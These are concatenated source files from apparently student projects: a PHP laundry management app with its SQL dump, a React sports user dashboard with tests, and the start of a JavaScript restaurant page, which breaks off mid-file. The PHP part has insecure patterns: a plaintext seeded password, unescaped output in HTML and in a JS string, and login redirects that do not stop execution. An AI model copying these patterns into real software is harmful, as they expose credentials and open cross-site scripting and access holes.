<div class="col-lg-1" style="margin-top: 35px;">
<button type="button" class="btn btn-danger btn-sm" onclick="deleteRow('#row-<?php echo $i ?>')"><i class="fa fa-trash"></i></button>
</div>
</div>
<?php endforeach ?>
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<script>
var layanan = JSON.parse('<?php echo json_encode($layanan) ?>');
</script>
<?php require_once "partials/footer.php"; ?><file_sep>/src/home.php
<?php
redirectWhenGuest('login.php');
?><file_sep>/lib/request.php
<?php
function isButtonSubmit($name = 'submit'){
return isset($_POST[$name]);
}
function postReq($name, $default = ''){
return $_POST[$name] ?? $default;
}
function getReq($name, $default = ''){
return $_GET[$name] ?? $default;
}
function isPost(){
return $_SERVER['REQUEST_METHOD'] == "POST";
}
function isGet(){
return $_SERVER['REQUEST_METHOD'] == "GET";
}
function isEdit(){
return getReq('action') == "edit";
}
function isAdd(){
return getReq('action') == "add";
}
function isDelete(){
return getReq('action') == "delete";
}<file_sep>/rpl_laundry.sql
-- phpMyAdmin SQL Dump
-- version 4.9.0.1
-- https://www.phpmyadmin.net/
--
-- Host: localhost
-- Generation Time: Jul 29, 2019 at 12:55 PM
-- Server version: 10.3.15-MariaDB
-- PHP Version: 7.3.6
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `rpl_laundry`
--
-- --------------------------------------------------------
--
-- Table structure for table `detail_transaksi`
--
CREATE TABLE `detail_transaksi` (
`id` int(11) NOT NULL,
`kode_transaksi` varchar(20) NOT NULL,
`layanan_id` int(11) DEFAULT NULL,
`jumlah` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `detail_transaksi`
--
INSERT INTO `detail_transaksi` (`id`, `kode_transaksi`, `layanan_id`, `jumlah`) VALUES
(1, 'TRX-057c520833', 1, 1);
-- --------------------------------------------------------
--
-- Table structure for table `konsumen`
--
CREATE TABLE `konsumen` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`no_hp` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `konsumen`
--
INSERT INTO `konsumen` (`id`, `nama`, `no_hp`) VALUES
(2, 'Yuka', '0832143456');
-- --------------------------------------------------------
--
-- Table structure for table `layanan`
--
CREATE TABLE `layanan` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`harga` int(11) NOT NULL,
`satuan` varchar(10) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `layanan`
--
INSERT INTO `layanan` (`id`, `nama`, `harga`, `satuan`) VALUES
(1, 'Cuci Reguler', 5500, 'KG'),
(2, 'Cuci Ekspres', 7000, 'KG');
-- --------------------------------------------------------
--
-- Table structure for table `pegawai`
--
CREATE TABLE `pegawai` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`no_hp` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `pegawai`
--
INSERT INTO `pegawai` (`id`, `nama`, `no_hp`) VALUES
(2, 'Ahmad', '087324023435');
-- --------------------------------------------------------
--
-- Table structure for table `transaksi`
--
CREATE TABLE `transaksi` (
`kode_transaksi` varchar(20) NOT NULL,
`konsumen_id` int(11) DEFAULT NULL,
`pegawai_id` int(11) DEFAULT NULL,
`tanggal_transaksi` timestamp NOT NULL DEFAULT current_timestamp(),
`tanggal_ambil` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` tinyint(4) NOT NULL DEFAULT 1,
`total` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `transaksi`
--
INSERT INTO `transaksi` (`kode_transaksi`, `konsumen_id`, `pegawai_id`, `tanggal_transaksi`, `tanggal_ambil`, `status`, `total`) VALUES
('TRX-057c520833', 2, 2, '2019-07-28 17:00:00', '2019-07-30 17:00:00', 1, 5500);
-- --------------------------------------------------------
--
-- Table structure for table `user_login`
--
CREATE TABLE `user_login` (
`id` int(11) NOT NULL,
`username` varchar(20) NOT NULL,
`password` varchar(64) NOT NULL,
`pegawai_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `user_login`
--
INSERT INTO `user_login` (`id`, `username`, `password`, `pegawai_id`) VALUES
(1, '<PASSWORD>', 'password', 2);
--
-- Indexes for dumped tables
--
--
-- Indexes for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
ADD PRIMARY KEY (`id`),
ADD KEY `kode_transaksi` (`kode_transaksi`),
ADD KEY `layanan_id` (`layanan_id`);
--
-- Indexes for table `konsumen`
--
ALTER TABLE `konsumen`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `layanan`
--
ALTER TABLE `layanan`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `pegawai`
--
ALTER TABLE `pegawai`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `transaksi`
--
ALTER TABLE `transaksi`
ADD PRIMARY KEY (`kode_transaksi`),
ADD KEY `konsumen_id` (`konsumen_id`),
ADD KEY `pegawai_id` (`pegawai_id`);
--
-- Indexes for table `user_login`
--
ALTER TABLE `user_login`
ADD PRIMARY KEY (`id`),
ADD KEY `pegawai_id` (`pegawai_id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `konsumen`
--
ALTER TABLE `konsumen`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `layanan`
--
ALTER TABLE `layanan`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;
--
-- AUTO_INCREMENT for table `pegawai`
--
ALTER TABLE `pegawai`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT for table `user_login`
--
ALTER TABLE `user_login`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
ADD CONSTRAINT `detail_transaksi_ibfk_1` FOREIGN KEY (`kode_transaksi`) REFERENCES `transaksi` (`kode_transaksi`) ON DELETE CASCADE,
ADD CONSTRAINT `detail_transaksi_ibfk_2` FOREIGN KEY (`layanan_id`) REFERENCES `layanan` (`id`) ON DELETE SET NULL;
--
-- Constraints for table `transaksi`
--
ALTER TABLE `transaksi`
ADD CONSTRAINT `transaksi_ibfk_1` FOREIGN KEY (`konsumen_id`) REFERENCES `konsumen` (`id`) ON DELETE SET NULL,
ADD CONSTRAINT `transaksi_ibfk_2` FOREIGN KEY (`pegawai_id`) REFERENCES `pegawai` (`id`) ON DELETE SET NULL;
--
-- Constraints for table `user_login`
--
ALTER TABLE `user_login`
ADD CONSTRAINT `user_login_ibfk_1` FOREIGN KEY (`pegawai_id`) REFERENCES `pegawai` (`id`) ON DELETE CASCADE;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/views/form_edit_transaksi.php
<?php
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Layanan</h3>
<form action="<?php echo getCurrentUrl() ?>" method="post">
<div class="form-group">
<label for="tanggal_ambil">Tanggal Ambil</label>
<input type="date" required class="form-control" name="tanggal_ambil" id="tanggal_ambil" value="<?php echo $tanggal_ambil ?>">
</div>
<div class="form-group">
<label for="status">Status</label>
<select class="form-control" name="status" id="status">
<option>--PILIH STATUS--</option>
<?php foreach($statuses as $sts):?>
<option value="<?php echo $sts?>" <?php echo $sts == $status ? "selected":""?> ><?php echo statusTrasaction($sts);?></option>
<?php endforeach?>
</select>
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<script>
var layanan = JSON.parse('<?php echo json_encode($layanan) ?>');
</script>
<?php require_once "partials/footer.php"; ?><file_sep>/views/form_pegawai.php
<?php
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Pegawai</h3>
<form action="" method="post">
<div class="form-group">
<label for="nama">Nama</label>
<input type="text" required class="form-control" name="nama" id="nama" value="<?php echo $nama ?>">
</div>
<div class="form-group">
<label for="username">Username</label>
<input type="text" required class="form-control" name="username" id="username" value="<?php echo $username ?>">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="<PASSWORD>" class="form-control" name="password" id="password">
</div>
<div class="form-group">
<label for="no_hp">No Handphone</label>
<input type="text" required class="form-control" name="no_hp" id="no_hp" value="<?php echo $no_hp ?>">
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?><file_sep>/views/partials/menu.php
<?php
$menus = [
"index.php" => "Beranda",
"pegawai.php" => "Pegawai",
"konsumen.php" => "Konsumen",
"layanan.php" => "Layanan",
"transaksi.php" => "Transaksi",
"logout.php" => "Keluar",
];
?>
<div class="nav flex-column nav-pills"role="tablist" aria-orientation="vertical">
<?php foreach($menus as $file => $menuName):?>
<a class="nav-link <?php echo $file == currScript() ? "active" : ""; ?>" href="<?php echo $file ?>" role="tab"><?php echo $menuName ?></a>
<?php endforeach; ?>
</div><file_sep>/lib/auth.php
<?php
session_start();
function setUser($user){
$_SESSION["user"] = [
"id" => $user->id,
"nama" => $user->nama,
"username" => $user->username,
"pegawai_id" => $user->pegawai_id
];
}
function getUserInfo($key){
$data = $_SESSION["user"][$key];
return isset($_SESSION["user"][$key])? $data : null;
}
function isAuthenticated(){
return isset($_SESSION['user']);
}
function isGuest(){
return !isAuthenticated();
}
function redirectWhenAuthenticated($location){
if(isAuthenticated())
header("location: $location");
}
function redirectWhenGuest($location){
if(!isAuthenticated())
header("location: $location");
}
function redirectWhenNotAdmin($location){
if(isAuthenticated() && (getUserInfo('role') != "ADMIN"))
header("location: $location");
}<file_sep>/lib/bootstrap.php
<?php
require_once "db.php";
require_once "auth.php";
require_once "format.php";
require_once "request.php";
require_once "cart_lib.php";
require_once "url.php";
require_once "error.php"; | 28b5c7f812732aefb93a5dbd2724fcae36c4f349 | [
"Markdown",
"SQL",
"JavaScript",
"PHP"
] | 30 | PHP | alaraiabdiallah/tubes_rpl | ae21f5ea50510a4e42822762a6ee132d5f039c2f | 50796f25fbe76679b8051f7417c09004a79ca795 |
refs/heads/master | <file_sep>import React, { Component } from 'react';
import ApiService from '../../services/api.service';
import Table from '../../components/Table';
import DashboardHeader from './DashboardHeader';
import { confirmAlert } from 'react-confirm-alert';
import 'react-confirm-alert/src/react-confirm-alert.css';
export default class Dashboard extends Component {
constructor(props) {
super(props)
this.state = {
searchTerm: '',
users: [],
defaultUsers: []
}
this.onChangeSearch = this.onChangeSearch.bind(this);
}
componentDidMount() {
this.getUsers();
}
getUsers = async () => {
try {
let users = await ApiService.getUsers();
this.setState({ users, defaultUsers: users });
} catch (err) {
console.error(err);
}
}
confirmDelete = (userId) => {
confirmAlert({
title: 'Delete user',
message: 'Do you want to delete this user?',
buttons: [
{
label: 'Deletar',
onClick: () => this.deleteUser(userId)
},
{
label: 'Cancel',
onClick: () => { }
}
]
});
}
deleteUser = (userId) => {
let { users } = this.state;
users = users.filter(el => el.id !== userId);
this.setState({ users });
}
onChangeSearch = (event) => {
let searchTerm = event.target.value;
this.setState({ searchTerm });
let { users, defaultUsers } = this.state;
if (searchTerm) {
let regex = new RegExp(searchTerm.toLowerCase());
users = defaultUsers.filter(element => {
return element.name.toLowerCase().match(regex) || element.username.toLowerCase().match(regex);
});
} else {
users = defaultUsers
}
this.setState({ users });
}
render() {
return (
<div className="container-fluid">
<DashboardHeader></DashboardHeader>
<div className="container-fluid">
<div className="row justify-content-md-center">
<div className="col-md-1 col-sm-12">
<h1>Users</h1>
</div>
<div className="col-md-7 col-sm-12">
<hr></hr>
</div>
<div className="col-md-3 col-sm-12">
<input
className="form-control" type="search"
value={this.state.searchTerm}
onChange={this.onChangeSearch}
placeholder="Filter table content"
aria-label="Search"></input>
</div>
</div>
<Table
users={this.state.users}
onDelete={this.confirmDelete}
></Table>
</div>
</div>
)
}
}
<file_sep>import React, { Component } from 'react';
export default class RegisterHeader extends Component {
render() {
return (
<div className="container-fluid">
<div className="row justify-content-md-center">
<div className="col-md-2 com-sm-12">
<h1>Registration</h1>
</div>
<div className="col-md-10 col-sm-12">
<hr></hr>
</div>
</div>
<div className="row justify-content-md-center header-register">
<div className="col-md-4 col-sm-12">
<h3>Need help?</h3>
<div className="row ">
<div className="col-2">
<h1><i className="far fa-life-ring"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
<div className="col-md-4 col-sm-12">
<h3>Why register?</h3>
<div className="row">
<div className="col-2">
<h1><i className="fas fa-heartbeat"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
<div className="col-md-4 col-sm-12">
<h3>What people are saying...</h3>
<div className="row">
<div className="col-2">
<h1><i className="far fa-smile"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
</div>
</div>
)
}
}<file_sep>import React from 'react';
import { BrowserRouter as Router, Route, Redirect, } from "react-router-dom";
import NavBar from '../components/NavBar';
import Navigation from '../components/Navigation';
import Dashboard from './Dashboard/Dashboard';
import Register from './Register/Register';
import 'bootstrap/dist/css/bootstrap.css';
import 'bootstrap/dist/js/bootstrap.js';
function App() {
return (
<div className="App">
<NavBar></NavBar>
<Router>
<Navigation>
<Route exact path="/" render={() => (
<Redirect to="/user" />
)} />
<Route path="/user" exact component={Dashboard} />
<Route path="/user/new" exact component={Register} />
</Navigation>
</Router>
</div>
);
}
export default App;
<file_sep>/**
* @param {String} url
* @returns Promise<any>
*/
export function extractAsyncData(url) {
return new Promise((resolve, reject) => {
fetch(url)
.then(data => data.json())
.then(resolve)
.catch(reject);
});
}<file_sep># React-App-Sports
### Clone
Clone repository
$ git clone <EMAIL>:RafaelSSilveira/react-app-sports.git
### Build
Install dependecies
$ npm install
### Run
Run project
$ npm start
Acess http://localhost:3000/
### Run Tests
$ npm run test<file_sep>import React, { Component } from 'react'
import Input from '../../components/Input'
import Button from '../../components/Button'
import Radio from './Radio'
import Checkbox from './Checkbox';
import ApiService from '../../services/api.service';
import RideInGroupMock from '../../services/mocks/rideInGroup';
import DaysOfWeek from '../../services/mocks/dayOfWeek';
import RegisterHeader from './RegisterHeader';
export default class Register extends Component {
constructor(props) {
super(props);
this.state = {
rideInGroupOptions: RideInGroupMock.labels,
daysOfWeekOptions: DaysOfWeek.labels,
username: '',
name: '',
email: '',
city: '',
rideInGroup: '',
daysOfWeek: []
}
}
formSubmit = (event) => {
event.preventDefault();
this.saveUser();
}
saveUser = async () => {
let { username, name, email, city, rideInGroup, daysOfWeek } = this.state;
let response = await ApiService.saveUser(name, username, email, city, rideInGroup, daysOfWeek);
if (response) {
this.props.history.push('/user')
}
}
onNameChange = (event) => {
this.setState({ name: event.target.value });
}
onUsernameChange = (event) => {
this.setState({ username: event.target.value });
}
onEmailChange = (event) => {
this.setState({ email: event.target.value });
}
onCityChange = (event) => {
this.setState({ city: event.target.value });
}
onRideInGroupChange = (event) => {
this.setState({ rideInGroup: event.target.value });
}
clearInputs = () => {
this.setState({
name: '',
username: '',
email: '',
city: '',
rideInGroup: '',
daysOfWeek: []
})
}
onDaysOfWeekChange = (event) => {
let { checked, value } = event.target;
let { daysOfWeek } = this.state;
if (checked === true) {
daysOfWeek = [
...daysOfWeek,
value
]
this.setState({
daysOfWeek
});
} else {
daysOfWeek = daysOfWeek.filter(el => el !== value);
this.setState({ daysOfWeek });
}
}
render() {
return (
<div className="register">
<RegisterHeader></RegisterHeader>
<form onSubmit={this.formSubmit}>
<div className="container">
<hr></hr>
<div className="form-row">
<Input id="username" type="username" placeholder="" label="Username" onChange={this.onUsernameChange} value={this.state.username} required={true} />
<Input id="city" type="text" placeholder="" label="City" onChange={this.onCityChange} value={this.state.city} required={true} />
</div>
<div className="form-row">
<Input id="name" type="text" placeholder="" label="Name" onChange={this.onNameChange} value={this.state.name} required={true} />
<Radio onChange={this.onRideInGroupChange}></Radio>
</div>
<div className="form-row">
<Input id="email" type="email" placeholder="" label="E-mail" onChange={this.onEmailChange} value={this.state.email} required={true} />
<Checkbox onChange={this.onDaysOfWeekChange}></Checkbox>
</div>
<div className="form-row btn-register">
<Button id='btn-salvar' text='Save' type="submit" className="btn btn-save"></Button>
<Button id='btn-salvar' text='Discard' type="button" className="btn btn-cancel" onClick={this.clearInputs}></Button>
</div>
</div>
</form>
</div>
)
}
}<file_sep>import React, { Component } from 'react';
export default class DashboardHeader extends Component {
render() {
return (
<div className="row justify-content-start header-dashboard">
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-puzzle-piece icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Sport Type</p>
<h2>Cycling</h2>
</div>
</div>
</div>
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-trophy icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Mode</p>
<h2>Advanced</h2>
</div>
</div>
</div>
<div>
<div className="row">
<div className="col-3 teste">
<h1><i className="fas fa-map-signs icon-default"></i></h1>
</div>
<div className="col-9 teste2">
<p>Route</p>
<h2>30 miles</h2>
</div>
</div>
</div>
</div>
)
}
}<file_sep>import React, { Component } from 'react';
import { BrowserRouter as Router, Link } from "react-router-dom";
export default class Navigation extends Component {
render() {
return (
<Router>
<nav className="navbar navbar-expand-lg navigation">
<div className="collapse navbar-collapse" id="navbarNav">
<ul className="navbar-nav">
<li className="nav-item icon-default">
<i className="fas fa-home"></i>
</li>
<i className="fas fa-chevron-right"></i>
<li className="nav-item">
<Link to="/user">Dashboard</Link>
</li>
<i className="fas fa-chevron-right"></i>
<li className="nav-item">
<Link to="/user/new">Register</Link>
</li>
</ul>
</div>
</nav>
{this.props.children}
</Router>
)
}
}
<file_sep>import * as endpoint from '../utils/endpoint';
import { extractAsyncData } from '../utils/extract';
import RideInGroupMock from './mocks/rideInGroup'
import DayOfWeekMock from './mocks/dayOfWeek'
class ApiService {
users = [];
/**
* @description Get users
* @returns Promise
*/
getUsers = async () => {
if (this.users.length === 0) {
let users = await extractAsyncData(endpoint.USERS);
for (let i = 0; i < users.length; i++) {
users[i] = await this._getExtraUserInfo(users[i]);
}
this.users = users;
return users;
} else {
return this.users;
}
}
/**
* @param {Number} userId
* @description Get albuns
* @returns Promise
*/
getAlbums = (userId) => {
return extractAsyncData(`${endpoint.ALBUMS}?userId=${userId}`);
}
/**
* @param {Number} albumId
* @description Get photos
* @returns Promise
*/
getPhotos = (albumId) => {
return extractAsyncData(`${endpoint.PHOTOS}?albumId=${albumId}`);
}
/**
* @param {Number} userId
* @description Get albuns
* @returns Promise
*/
getPosts = (userId) => {
return extractAsyncData(`${endpoint.POSTS}?userId=${userId}`);
}
/**
* @description Get random Ride in Group Labels
* @returns String[]
*/
getRandomRideInGroup() {
return RideInGroupMock.random();
}
/**
* @description Get Random Day Of Week Labels
* @returns String[]
*/
getRandomDayOfWeek() {
return DayOfWeekMock.random();
}
getAllRideInGroup() {
return RideInGroupMock.labels;
}
getAllDayOfWeek() {
return DayOfWeekMock.labels;
}
/**
*
* @param {String} name
* @param {String} username
* @param {String} email
* @param {String} city
* @param {Array of RideInGroup} rideInGroup
* @param {Array of DaysOfWeek} daysOfWeek
* @returns Promise<boolean>
*/
async saveUser(name, username, email, city, rideInGroup, daysOfWeek) {
let user = {
name,
username,
email,
address: {
street: '',
suite: '',
city,
zipcode: ''
},
rideInGroup,
daysOfWeek,
photos: [],
albums: [],
posts: []
}
return new Promise((resolve, reject) => {
this.users.unshift(user);
resolve(true);
})
}
/**
* @param {User} user
* @description Get more information about the user "Post, Albums, Photos, Days Of Week and Ride in Group"
*/
_getExtraUserInfo = async (user) => {
user.daysOfWeek = this.getRandomDayOfWeek();
user.rideInGroup = this.getRandomRideInGroup();
user.albums = await this.getAlbums(user.id);
user.posts = await this.getPosts(user.id);
user.photos = [];
user.albums.forEach(album => {
this.getPhotos(album.id).then(photos => {
user.photos = [
...user.photos,
...photos
]
});
})
return user;
}
}
export default new ApiService();<file_sep>export const USERS = "https://jsonplaceholder.typicode.com/users";
export const PHOTOS = "https://jsonplaceholder.typicode.com/photos";
export const ALBUMS = "https://jsonplaceholder.typicode.com/albums";
export const POSTS = "https://jsonplaceholder.typicode.com/posts";<file_sep>class DaysOfWeekMock {
labels = [
{
description: 'Every Day',
multiple: false
},
{
description: 'Week Days',
multiple: false
},
{
description: 'Sun',
multiple: true
},
{
description: 'Mon',
multiple: true
},
{
description: 'Tue',
multiple: true
},
{
description: 'Wed',
multiple: true
},
{
description: 'Thu',
multiple: true
},
{
description: 'Fri',
multiple: true
},
{
description: 'Sat',
multiple: true
}
];
/**
* @description Returns a random Day Of Week Label ["Every Day", "Week Days", "Sun", "Mon", "Tue", "Web", "Thu", "Fri"]
* @returns String[]
*/
random() {
let max = Math.floor((Math.random() * 3) + 1);
let labels = [];
for (let i = 0; i < max; i++) {
let options = [];
if (max === 1) {
options = this.labels.filter(el => el.multiple === false);
} else {
options = this.labels.filter(el => el.multiple === true);
}
let item = options[Math.floor(Math.random() * options.length)]
labels.push(item.description);
}
return labels;
}
}
export default new DaysOfWeekMock();<file_sep>import React, { Component } from 'react';
export default class Navbar extends Component {
render() {
return (
<nav className="navbar navbar-light bg-light justify-content-between">
<span className="navbar-brand mb-0 h1 justify-content-end">
<span className="navabar-icon icon-default"><i className="fas fa-question"></i></span>
Venturus Sports
</span>
<form className="form-inline">
<div className="btn-group">
<button type="button" className="btn" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span className="navbar-avatar">JS</span> <NAME> <i className="fas fa-angle-down"></i>
</button>
<div className="dropdown-menu dropdown-menu-right">
<button className="dropdown-item" type="button">Friends List</button>
<button className="dropdown-item" type="button">Saved Items</button>
<button className="dropdown-item" type="button">Notifications</button>
<button className="dropdown-item" type="button">User Preference</button>
<div className="dropdown-divider"></div>
<button className="dropdown-item" type="button">Log out</button>
</div>
</div>
</form>
</nav>
)
}
}
<file_sep>class RideInGroupMock {
labels = ["Always", "Sometimes", "Never"];
/**
* @description Returns a random Ride In Group Label ["Always", "Sometimes", "Never"]
* @returns String
*/
random() {
return this.labels[Math.floor(Math.random() * this.labels.length)];
}
}
export default new RideInGroupMock();<file_sep>import ApiService from './api.service';
jest.setTimeout(40000);
it('getRandomDayOfWeek', () => {
let allDays = ApiService.getAllDayOfWeek().map(el => { return el.description });
let days = ApiService.getRandomDayOfWeek();
expect(Array.isArray(days)).toBeTruthy()
days.forEach(day => {
expect(typeof day).toBe('string');
expect(allDays.includes(day)).toBeTruthy();
});
});
it('getRandomRideInGroup', () => {
let allRideInGroup = ApiService.getAllRideInGroup();
let rideInGroup = ApiService.getRandomRideInGroup();
expect(typeof rideInGroup).toBe('string');
expect(allRideInGroup.includes(rideInGroup)).toBeTruthy();
});
it('getAllRideInGroup', () => {
let rideInGroup = ApiService.getAllRideInGroup();
expect(Array.isArray(rideInGroup)).toBeTruthy();
rideInGroup.forEach(el => expect(typeof el).toBe('string'));
});
it('getAllDayOfWeek', () => {
let daysOfWeek = ApiService.getAllDayOfWeek();
expect(Array.isArray(daysOfWeek)).toBeTruthy();
daysOfWeek.forEach(el => {
expect(typeof el.description).toBe('string');
expect(typeof el.multiple).toBe('boolean');
});
});
it("getUsers", async (done) => {
let users = await ApiService.getUsers();
expect(Array.isArray(users)).toBeTruthy();
expect(users.length).toBeGreaterThan(0);
let user = users[0];
expect(typeof user).toBe('object');
expect(user.hasOwnProperty('id')).toBeTruthy();
expect(user.hasOwnProperty('name')).toBeTruthy();
expect(user.hasOwnProperty('username')).toBeTruthy();
expect(user.hasOwnProperty('email')).toBeTruthy();
expect(user.hasOwnProperty('address')).toBeTruthy();
expect(user.address.hasOwnProperty('city')).toBeTruthy();
expect(user.hasOwnProperty('posts')).toBeTruthy();
expect(user.hasOwnProperty('albums')).toBeTruthy();
expect(user.hasOwnProperty('photos')).toBeTruthy();
expect(user.hasOwnProperty('daysOfWeek')).toBeTruthy();
expect(user.hasOwnProperty('rideInGroup')).toBeTruthy();
done();
});
it('saveUser', (done) => {
let rideInGroup = ApiService.getRandomRideInGroup();
let daysOfWeek = ApiService.getRandomDayOfWeek();
ApiService.saveUser('User 1', 'user1', '<EMAIL>', 'São Paulo', rideInGroup, daysOfWeek)
.then(data => {
expect(data).toBeTruthy();
});
done();
});
it('getAlbums', async (done) => {
let albums = await ApiService.getAlbums(1);
expect(Array.isArray(albums)).toBeTruthy();
expect(albums.length).toBeGreaterThan(0);
let album = albums[0];
expect(typeof album).toBe('object');
expect(album.hasOwnProperty('id')).toBeTruthy();
expect(album.hasOwnProperty('userId')).toBeTruthy();
expect(album.hasOwnProperty('title')).toBeTruthy();
done();
}) | e0eb83d136152ad78e2b0c75c951442becb86310 | [
"JavaScript",
"Markdown"
] | 14 | JavaScript | RafaelSSilveira/react-app-sports | 6d1313a589ff1b8d0da1d133fe88e47849408596 | 6d4d37125d3caeb579a7010eb721f63f6367df5e |
refs/heads/master | <repo_name>a6macleod/js_restaurant<file_sep>/src/header.js
const content = document.querySelector("#content");
const header = () => {
function createNav() {
const nav = document.createElement("nav");
nav.id = "navContainer";
header.appendChild(nav);
// Nav links
const about = document.createElement("div");
about.id = "aboutLink";
about.classList.add("navBar");
about.classList.add("selectedPage");
about.innerHTML = "About";
const menu = document.createElement("div");
menu.id = "menuLink";
menu.classList.add("navBar");
menu.innerHTML = "Menu";
const contact = document.createElement("div");
contact.id = "contactLink";
contact.classList.add("navBar");
contact.innerHTML = "Contact";
nav.appendChild(about);
nav.appendChild(menu);
nav.appendChild(contact);
}
const header = document.createElement("header");
header.classList.add("header");
content.appendChild(header);
const logo = document.createElement("h1");
logo.classList.add("logo");
logo.innerHTML = "Treat <br> Factory";
header.appendChild(logo);
// add menu to header
const nav = createNav();
};
export { header };
<file_sep>/README.md
# js_restaurant
A restaurant page made using only javascript
The general idea is that a restaurant page will be created from javascript only. The aim is to practice using multiple javascript files with their own modules, using webpack to combine them, and manipulating the DOM to populate the HTML.
This project was created from [The Odin Project](https://www.theodinproject.com)
<file_sep>/src/contact.js
import { footer } from "./footer.js";
const content = document.querySelector("#content");
const contact = () => {
// create the body
const contactContent = document.createElement("div");
contactContent.id = "contentContainer";
contactContent.classList.add("contentArea");
content.appendChild(contactContent);
// Hours
const hoursContainer = document.createElement("div");
hoursContainer.id = "hoursContainer";
hoursContainer.classList.add("subsectionContainer");
contactContent.appendChild(hoursContainer);
const hoursTitle = document.createElement("h2");
hoursTitle.classList.add("sectionTitle");
hoursTitle.innerHTML = "Cafe Hours";
hoursContainer.appendChild(hoursTitle);
const hours = document.createElement("p");
hours.classList.add("contentSection");
hours.innerHTML =
"Monday - Friday: 7 - 5:30<br><br>Saturday: 7 - 9:00<br><br>Sunday: 11 - 5:30<br>";
hoursContainer.appendChild(hours);
// Location
const locationContainer = document.createElement("div");
locationContainer.id = "locationContainer";
locationContainer.classList.add("subsectionContainer");
contactContent.appendChild(locationContainer);
const locationTitle = document.createElement("h2");
locationTitle.classList.add("sectionTitle");
locationTitle.innerHTML = "Our Location";
locationContainer.appendChild(locationTitle);
const locationMap = document.createElement("div");
locationMap.id = "locationMap";
locationMap.innerHTML =
'<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m12!1m3!1d1475.8376921761615!2d-83.74492280755015!3d42.28545228672461!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!5e0!3m2!1sen!2sus!4v1571769065815!5m2!1sen!2sus" width="600" height="450" frameborder="0" style="border:0;" allowfullscreen=""></iframe>';
locationContainer.appendChild(locationMap);
const locationAddress = document.createElement("p");
locationAddress.classList.add("contactContent");
locationAddress.innerHTML = "111 Detroit St. Ann Arbor, MI";
locationContainer.appendChild(locationAddress);
// Phone Number
const phoneContainer = document.createElement("div");
phoneContainer.id = "phoneContainer";
